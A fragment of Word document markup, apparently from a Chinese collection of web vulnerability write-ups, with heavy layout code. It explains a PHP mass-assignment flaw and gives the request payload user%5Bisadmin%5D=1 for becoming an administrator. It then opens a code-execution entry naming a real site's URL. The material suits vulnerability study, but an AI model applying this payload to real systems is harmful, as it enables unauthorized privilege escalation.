            <v:rect id="_x0000_s4965" style="position:absolute;left:385;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4964" style="position:absolute;left:485;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4963" style="position:absolute;left:585;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4962" style="position:absolute;left:685;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4961" style="position:absolute;left:785;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4960" style="position:absolute;left:885;top:2530;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4959" style="position:absolute;left:985;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4958" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4957" style="position:absolute;left:185;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4956" style="position:absolute;left:285;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4955" style="position:absolute;left:385;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4954" style="position:absolute;left:485;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4953" style="position:absolute;left:585;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4952" style="position:absolute;left:685;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4951" style="position:absolute;left:785;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4950" style="position:absolute;left:885;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4949" style="position:absolute;left:985;top:2856;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4948" style="position:absolute;left:1226;top:2856;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4947" style="position:absolute;left:1346;top:2856;width:2892;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4946" style="position:absolute;left:5;top:3119;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4945" style="position:absolute;left:185;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4944" style="position:absolute;left:285;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4943" style="position:absolute;left:385;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4942" style="position:absolute;left:485;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4941" style="position:absolute;left:585;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4940" style="position:absolute;left:685;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4939" style="position:absolute;left:785;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4938" style="position:absolute;left:885;top:3182;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4937" style="position:absolute;left:5;top:3445;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4936" style="position:absolute;left:185;top:3508;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4935" style="position:absolute;left:5;top:3771;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4934" style="position:absolute;left:185;top:3834;width:2892;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4933" style="position:absolute;left:5;top:4097;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4932" style="position:absolute;left:185;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4931" style="position:absolute;left:285;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4930" style="position:absolute;left:385;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4929" style="position:absolute;left:485;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4928" style="position:absolute;left:585;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4927" style="position:absolute;left:685;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4926" style="position:absolute;left:785;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4925" style="position:absolute;left:885;top:4160;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4924" style="position:absolute;left:5;top:4423;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4923" style="position:absolute;left:185;top:4486;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4922" style="position:absolute;left:5;top:4749;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4921" style="position:absolute;left:185;top:4812;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4920" style="position:absolute;left:5;top:5075;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4919" type="#_x0000_t75" style="position:absolute;left:185;top:5138;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:shape id="_x0000_s4918" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:5581" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="2"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="21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180" w:right="50" w:firstLine="159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setcookie(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'setok', json_encode(array('lang'=&gt;L('setting2'),'ico'=&gt;2)),0, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>'/');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="4"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="28"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1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header(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'location:'.SITE_URL.'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/?m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=guide');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="17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exit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;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/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 var_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dump(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$userdata);die;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="4"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="19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180" w:right="298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$user-&gt;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where(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"user_id='".$this-&gt;my['user_id']."'")-&gt;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data(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$userdata)-&gt;save();</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="4"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="28"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1" w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="52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header(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'location:'.SITE_URL.'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/?m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=guide&amp;a=followtopic </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="2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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="35" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="465"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$userdata=$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>POST[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>"user"];//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>获取用户提交的所有数据，然后进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>行了一些常规的检测之后，就执行了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="65"/>
        <w:ind w:left="417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$user-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>where(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>"user_id='".$this-&gt;my['user_id']."'")-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>data(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="27"/>
        <w:ind w:left="417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$userdata)-&gt;save();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存入数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="415"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这样写的问题是，用户可以自己添加别的字段，而因为此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-70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>cms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-37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管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>员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表跟普通用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>表又在一个表里，（区分的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>志是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-88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isadmin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字段）因而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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可以造成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>限提升</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注册普通用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，然后来到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>置向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>里，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>拦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>送的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia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3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="17"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4001483" cy="1693926"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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9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483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spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="7120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251964</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3977197" cy="1183671"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="11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197" cy="1183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Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">user%5Bisadmin%5D=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可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MS Mincho"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="540" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="代码执行"/>
      <w:bookmarkStart w:id="79" w:name="初刻Crucco主站任意代码执行"/>
      <w:bookmarkStart w:id="80" w:name="_bookmark36"/>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r>
        <w:t>代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="43"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初刻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-124"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">Crucco </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主站任意代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kelon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="66"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId91">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Verdana"/>
          </w:rPr>
          <w:t>http://www.crucco.com/huodongye.php?pn=zucefangsi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
